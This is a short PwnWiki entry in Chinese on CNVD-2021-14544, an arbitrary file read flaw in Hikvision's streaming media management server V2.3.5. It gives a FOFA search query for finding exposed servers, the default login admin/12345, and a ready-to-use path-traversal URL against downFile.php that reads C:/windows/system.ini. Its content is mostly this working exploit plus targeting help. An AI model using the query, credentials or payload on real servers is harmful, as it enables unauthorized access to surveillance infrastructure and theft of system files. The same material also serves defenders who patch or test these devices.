CNVD-2021-14544 HIKVISION 流媒體管理服務器後台任意文件讀取漏洞

From PwnWiki

Revision as of 21:32, 26 May 2021 by Pwnwiki (talk | contribs) (Created page with "==默認登錄信息==")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（简体）‎ • ‎中文（繁體）‎

漏洞影響

杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5

FOFA

FOFA：title="流媒体管理服务器"

默認登錄信息

admin/12345

POC

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

成功讀取 C:/windows/system.ini

參考

https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-14544_HIKVISION_流媒體管理服務器_後台任意文件讀取漏洞/zh-hant&oldid=3488"